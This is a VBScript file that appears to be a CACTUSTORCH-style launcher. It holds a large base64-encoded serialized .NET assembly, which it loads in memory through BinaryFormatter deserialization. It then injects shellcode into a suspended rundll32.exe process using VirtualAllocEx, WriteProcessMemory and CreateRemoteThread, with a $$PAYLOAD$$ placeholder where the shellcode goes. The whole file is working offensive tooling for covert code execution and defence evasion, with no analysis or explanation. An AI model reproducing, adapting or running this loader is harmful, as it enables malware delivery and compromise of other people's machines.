Dim binary : binary = "rundll32.exe"
Dim code : code = "$$PAYLOAD$$"

Sub Debug(s)
End Sub
Sub SetVersion
Dim shell
Set shell = CreateObject("WScript.Shell")
Dim ver
ver = "v4.0.30319"
On Error Resume Next
shell.RegRead "HKLM\SOFTWARE\\Microsoft\.NETFramework\v4.0.30319\"
If Err.Number <> 0 Then
  ver = "v2.0.50727"
  Err.Clear
End If
shell.Environment("Process").Item("COMPLUS_Version") = ver
End Sub
Function Base64ToStream(b)
  Dim enc, length, ba, transform, ms
  Set enc = CreateObject("System.Text.ASCIIEncoding")
  length = enc.GetByteCount_2(b)
  Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")
  Set ms = CreateObject("System.IO.MemoryStream")
  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
  ms.Position = 0
  Set Base64ToStream = ms
End Function

Sub Run
Dim s, entry_class
s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"
s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"
s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"
s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"
s = s & "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"
s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"
s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"
s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"
s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"
s = s & "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"
s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"
s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"
s = s & "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"
s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"
s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"
s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"
s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"
s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"
s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"
s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"
s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"
s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"
s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAWIaiWgAAAAAA"
s = s & "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAADuNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"
s = s & "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAnDUA"
s = s & "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"
s = s & "AAAALnRleHQAAAD0FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"
s = s & "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"
s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAANA1AAAAAAAASAAAAAIABQAMIgAAkBMAAAEAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"
s = s & "MAoAHAEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMKAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"
s = s & "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"
s = s & "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAo5gAAAABEFFnMR"
s = s & "AAAKByAAMAAAGigCAAAGEwYSBigWAAAKclcAAHAoGAAACiwKEQUWKAUAAAYmKhYTBxIIBo5pKBEA"
s = s & "AAoRBREGBhEIEQcoBAAABiYRBREGBx8gFnMRAAAKKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMR"
s = s & "AAAKKAYAAAYmKnoCfhUAAAp9AgAABAIoDwAACgICKBkAAAp9AQAABCoAEzACAGAAAAAAAAAAAn4V"
s = s & "AAAKfSsAAAQCfhUAAAp9LAAABAJ+FQAACn0tAAAEAn4VAAAKfTgAAAQCfhUAAAp9OQAABAJ+FQAA"
s = s & "Cn06AAAEAn4VAAAKfTsAAAQCKA8AAAoCAigZAAAKfSoAAAQqQlNKQgEAAQAAAAAADAAAAHYyLjAu"
s = s & "NTA3MjcAAAAABQBsAAAAXAcAACN+AADIBwAAdAkAACNTdHJpbmdzAAAAADwRAABcAAAAI1VTAJgR"
s = s & "AAAQAAAAI0dVSUQAAACoEQAA6AEAACNCbG9iAAAAAAAAAAIAAAFXHQIUCQIAAAD6ATMAFgAAAQAA"
s = s & "ABcAAAAJAAAAUAAAAAoAAAAkAAAAGQAAADMAAAASAAAAAQAAAAEAAAAGAAAAAQAAAAEAAAAHAAAA"
s = s & "AACZBgEAAAAAAAYAXAWSBwYAyQWSBwYAigRgBw8AsgcAAAYAsgThBgYAMAXhBgYAEQXhBgYAsAXh"
s = s & "BgYAfAXhBgYAlQXhBgYAyQThBgYAngRzBwYAfARzBwYA9AThBgYAqwipBgYAYQSpBgYATQWpBgYA"
s = s & "sAapBgYA5AipBgYAWQepBgYA2AipBgYAZgapBgYAhAZzBwAAAAAlAAAAAAABAAEAAQAQAG0GAAA9"
s = s & "AAEAAQAKABAA+AcAAD0AAQAJAAoBEADOBgAAQQAEAAoAAgEAABsIAABJAAgACgACAQAANggAAEkA"
s = s & "JwAKAAoAEAAGBwAAPQAqAAoAAgEAAG0EAABJADwACwACAQAA8wYAAEkARQALAAYAfQb6AAYARAc/"
s = s & "AAYAJAT9AAYAdAg/AAYA5wM/AAYAyAP6AAYAvQP6AAYGngMAAVaAsgIDAVaAwAIDAVaAZAADAVaA"
s = s & "iAIDAVaAwgADAVaAUwIDAVaA8QEDAVaAHQIDAVaABQIDAVaAoAEDAVaAAgMDAVaAXgEDAVaASAED"
s = s & "AVaA4QEDAVaATQIDAVaAMQIDAVaAagMDAVaAggMDAVaAmQIDAVaAHQMDAVaAdgEDAVaAdQADAVaA"
s = s & "PQADAVaAJwEDAVaAqAADAVaAOgMDAVaAuQEDAVaAGAEDAVaAxgEDAVaA5QIDAQYGngMAAVaAkQAH"
s = s & "AVaAcgIHAQYApgP6AAYA7wM/AAYAFwc/AAYAMwQ/AAYASwP6AAYAmgP6AAYA5wX6AAYA7wX6AAYA"
s = s & "Rwj6AAYAVQj6AAYA5AT6AAYALgj6AAYAAQkLAQYADQALAQYAGQA/AAYA7Ag/AAYA9gg/AAYANAc/"
s = s & "AAYGngMAAVaA3gIOAVaA7wAOAVaAnQEOAVaA2AIOAVaA1QEOAVaADwEOAVaAlAEOAVaAAwEOAQYG"
s = s & "ngMAAVaA5wASAVaAVwASAVaA1QASAVaAWAMSAVaAaQISAVaATwMSAVaA3QASAVaAYAMSAVaAEQYS"
s = s & "AVaAJAYSAVaAOQYSAQAAAACAAJYgLgAWAQEAAAAAAIAAliANCSoBCwAAAAAAgACWIBwJNQEQAAAA"
s = s & "AACAAJYgNAk/ARUAAAAAAIAAliBjCEkBGgAAAAAAgACRINQDTwEcAFAgAAAAAIYYPgcGACMAWCAA"
s = s & "AAAAhgBNBFoBIwCAIQAAAACGGD4HBgAlAKAhAAAAAIYYPgcGACUAAAABADsEAAACAFMEAAADAOQH"
s = s & "AAAEANEHAAAFAMEHAAAGAAsIAAAHANYIAAAIAEcJAQAJAAQHAgAKAMwGAAABABsEAAACAIsIAAAD"
s = s & "AAMGAAAEAGsEAAAFAL8IAAABABsEAAACAIsIAAADAAMGAAAEAMkIAAAFALIIAAABAHQIAAACAH0I"
s = s & "AAADACEHAAAEAAMGAAAFALUGAAABAHQIAAACAPoDAAABAHQIAAACANEHAAADAPcFAAAEAJUIAAAF"
s = s & "ACgHAAAGAAsIAAAHALIDAAABAC0JAAACAAEACQA+BwEAEQA+BwYAGQA+BwoAKQA+BxAAMQA+BxAA"
s = s & "OQA+BxAAQQA+BxAASQA+BxAAUQA+BxAAWQA+BxAAYQA+BxUAaQA+BxAAcQA+BxAAiQA+BwYAeQA+"
s = s & "BwYAmQBTBikAoQA+BwEAqQAEBC8AsQB5BjQAsQCkCDgAoQASBz8AoQBkBkIAsQBmCUYAsQBaCUYA"
s = s & "uQAKBkwACQAkAFoACQAoAF8ACQAsAGQACQAwAGkACQA0AG4ACQA4AHMACQA8AHgACQBAAH0ACQBE"
s = s & "AIIACQBIAIcACQBMAIwACQBQAJEACQBUAJYACQBYAJsACQBcAKAACQBgAKUACQBkAKoACQBoAK8A"
s = s & "CQBsALQACQBwALkACQB0AL4ACQB4AMMACQB8AMgACQCAAM0ACQCEANIACQCIANcACQCMANwACQCQ"
s = s & "AOEACQCUAOYACQCYAOsACQCgAFoACQCkAF8ACQD0AJYACQD4AJsACQD8APAACQAAAbkACQAEAeEA"
s = s & "CQAIAfUACQAMAb4ACQAQAcMACQAYAW4ACQAcAXMACQAgAXgACQAkAX0ACQAoAVoACQAsAV8ACQAw"
s = s & "AWQACQA0AWkACQA4AYIACQA8AYcACQBAAYwALgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJEB"
s = s & "LgAzAKIBLgA7AKIBLgBDAJEBLgBLAJEBLgBTAKIBLgBbAKgBLgBjAK4BLgBrANgBQwBbAKgBowBz"
s = s & "AFoAwwBzAFoAAwFzAFoAIwFzAFoAGgCMBgABAwAuAAEAAAEFAA0JAQAAAQcAHAkBAAABCQA0CQEA"
s = s & "AAELAGMIAQAAAQ0A1AMBAASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAA"
s = s & "AAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQy"
s = s & "AGxwUmVzZXJ2ZWQyADxNb2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJP"
s = s & "TV9KT0IARVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9V"
s = s & "TkRfRU5EAERVUExJQ0FURV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBD"
s = s & "UkVBVEVfTkVXX0NPTlNPTEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RV"
s = s & "U1RPUkNIAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJW"
s = s & "RV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVf"
s = s & "V09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVf"
s = s & "TkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VT"
s = s & "AENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NM"
s = s & "QVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9X"
s = s & "X05PUk1BTF9QUklPUklUWV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVU"
s = s & "QUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJV"
s = s & "R19PTkxZX1RISVNfUFJPQ0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVG"
s = s & "QVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVT"
s = s & "RU5UAENSRUFURV9OT19XSU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVS"
s = s & "SVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNi"
s = s & "AG1zY29ybGliAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVU"
s = s & "aHJlYWQAaFRocmVhZABscFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxl"
s = s & "AGxwSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUA"
s = s & "bHBDb21tYW5kTGluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERl"
s = s & "YnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmli"
s = s & "dXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZp"
s = s & "bGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJs"
s = s & "eURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlv"
s = s & "bnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0"
s = s & "cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJp"
s = s & "YnV0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2Rp"
s = s & "ZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBG"
s = s & "cm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABr"
s = s & "ZXJuZWwzMi5kbGwAQ0FDVFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dy"
s = s & "aXR0ZW4AbHBQcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVj"
s = s & "dGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3Rk"
s = s & "RXJyb3IALmN0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGlj"
s = s & "cwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT"
s = s & "ZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVz"
s = s & "AGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBD"
s = s & "cmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMA"
s = s & "ZHdZQ291bnRDaGFycwBUZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBB"
s = s & "ZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxPbGRQcm90ZWN0AGZsUHJvdGVj"
s = s & "dABmbE5ld1Byb3RlY3QAbHBFbnZpcm9ubWVudABDb252ZXJ0AGhTdGRJbnB1dABoU3RkT3V0cHV0"
s = s & "AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxQcm90ZWN0RXgAYmluYXJ5AFdyaXRl"
s = s & "UHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0"
s = s & "eQAAAQAZUAByAG8AZwByAGEAbQBXADYANAAzADIAAA13AGkAbgBkAGkAcgAAFVwAUwB5AHMAVwBP"
s = s & "AFcANgA0AFwAABVcAFMAeQBzAHQAZQBtADMAMgBcAAADMAAAABZi8URz/RpBkHALmYfP+r4ABCAB"
s = s & "AQgDIAABBSABARERBCABAQ4EIAEBAg4HCR0FGBIcERAOGBgIGAUAAR0FDgQAAQ4OAyAACAYAAw4O"
s = s & "Dg4CBhgDIAAOBQACAg4OBAABCBwIt3pcVhk04IkEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAABCAA"
s = s & "AAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABAAIAAAEABAAAAQAIAAABABAAAAEAIAAAAQAAAEA"
s = s & "BAAAAgAEAAAEAAQAAAgABAAAEAAEAAAgAAQAAAABBAAAAAIEAAAABAQAAAAIBAAAABAEAAAAIAQA"
s = s & "AABABAAAAIAEADAAAAQAAEAAAgYIAgYCAgYJAwYRFAMGERgCBgYDBhEgAwYRJBMAChgODhIMEgwC"
s = s & "ERQYDhIcEBEQCgAFGBgYGBEgESQJAAUYGBgYESQYCQAFAhgYHQUYCAUAAgIYCQoABxgYGAkYGAkY"
s = s & "BSACAQ4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABAB"
s = s & "AAtDQUNUVVNUT1JDSAAABQEAAAAABQEAAQAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFm"
s = s & "MzM3YWJlNTc3NwAADAEABzEuMC4wLjAAAAAAAMQ1AAAAAAAAAAAAAN41AAAAIAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAADQNQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg"
s = s & "ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"
s = s & "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"
s = s & "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"
s = s & "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"
s = s & "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"
s = s & "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"
s = s & "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"
s = s & "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"
s = s & "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"
s = s & "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"
s = s & "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"
s = s & "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"
s = s & "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"
s = s & "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"
s = s & "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"
s = s & "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"
s = s & "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAADAAAAwAAADwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"
s = s & "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"
entry_class = "cactusTorch"

Dim fmt, al, d, o
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = CreateObject("System.Collections.ArrayList")
al.Add fmt.SurrogateSelector

Set d = fmt.Deserialize_2(Base64ToStream(s))
Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
o.flame binary,code
End Sub

SetVersion
On Error Resume Next
Run
If Err.Number <> 0 Then
  Debug Err.Description
  Err.Clear
End If